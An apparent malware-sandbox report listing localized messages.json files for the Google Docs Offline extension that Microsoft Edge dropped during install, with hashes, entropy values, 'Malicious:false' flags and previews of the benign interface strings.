                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5500_395530944\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                        Malicious:false
